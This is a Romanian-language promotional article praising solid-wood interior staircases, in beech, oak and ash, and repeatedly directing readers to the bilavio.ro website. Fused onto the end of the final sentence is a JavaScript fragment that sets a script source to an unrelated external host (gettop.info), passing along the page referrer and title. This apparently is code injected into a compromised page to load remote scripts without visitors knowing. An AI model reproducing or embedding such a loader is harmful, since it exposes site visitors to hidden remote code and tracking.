scari din lemn

scari din lemn

In procesul de constructie al oricarei case ce va avea macar un etaj, inevitabil se va ajunge la alegerea unei scari de interior potrivita. Acestea pot fi de mai multe feluri, piata de profil din tara noastra, oferind o gama foarte variata de astfel de produse. Dupa parerea specialistilor atat din domeniul constructiilor, cat si din domeniul amenajarilor interioare, nici un tip de scara de interior nu se ridica la frumusetea si durabilitatea oferita de scarile din lemn masiv. Pe langa avantajele estetice oferite de aspectul natural al lemnului, exista si o multitudine de avantaje de ordin practic, ce trebuie luate in considerare.

   Alegerea scarii din lemn potrivita nevoilor fiecaruia

          Inainte de a discuta despre alegerea unei scari din lemn este bine de stiut din ce sunt alcatuite aceste tipuri de scari. Astfel, elementele din care este alcatuita o scara din lemn sunt rampa cu trepte si contratrepte, podestul sau odihna, vangurile precum si balustrada cu mana curenta. Scarile din lemn reprezinta o parte componenta a unei constructii complexe, scara facand spatiul locuintei mult mai util si mai frumos. Asa cum multi constructori sau proprietari stiu, alegerea scarii potrivite nevoilor fiecaruia poate sa dea batai de cap si celor mai diligenti dintre oameni. Fiind o componenta esentiala a unei case alegerea acesteia poate face diferenta dintre un interior armonios, o scara durabila si frumoasa si un posibil esec.

Este foarte important sa se aleaga o companie serioasa, care are o experienta vasta in acest domeniu. Astfel de companie se poate gasi si pe www.bilavio.ro. Aceasta companie se bucura de o indelungata experienta in domeniu, dovada stau cei peste 15 ani in care a onorat cele mai felurite comenzi atat in tara cat si peste hotare. Este in masura sa ofere oricarui doritor o gama variata de scari din lemn masiv, cele mai populare optiuni fiind scarile din lemn de fag, stejar, frasin sau lemn baituit. Toate dintre aceste variante vor aduce un plus de eleganta si stil oricarui interior, oferind in acelasi timp, datorita calitatii lemnului masiv, o durabilitate foarte ridicata.

Avantajele ce rezulta din optarea pentru scari din lemn masiv

          Pe langa avantajele vadite de ordin estetic oferite de frumusetea naturala a lemnului masiv, trebuie luate in considerare si o varietate de avantaje de ordin practic. Ca se se poata beneficia de aceste avantaje, viitoarea scara din lemn trebuie aleasa cu mare grija, apeland pareri avizate in domeniu. Astfel de specialisti se pot gasi si la www.bilavio.ro, find in masura sa ofere pareri si sfaturi specializate in vederea alegerii celei mai bune optiuni. Un prim avantaj oferit de scarile din lemn masiv este durabilitatea. Scara este de obicei una dintre cele mai traficate supravete din casa. Prin urmare este nevoie de o solutie care sa reziste tranzitului continuu fara a arata uzat. Folosind un lemn de esenta tare, scarile vor arata la fel chiar dupa mai multi ani de folosire. Un alt avantaj este ca sunt deosebit de usor de intretinut si curatat.

Alegeti inteligent cand vine vorba de scari de interior. Alegeti scari din lemn de la www.bilavio.ro pentru eleganta si durabilitate la preturi avantajoase.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;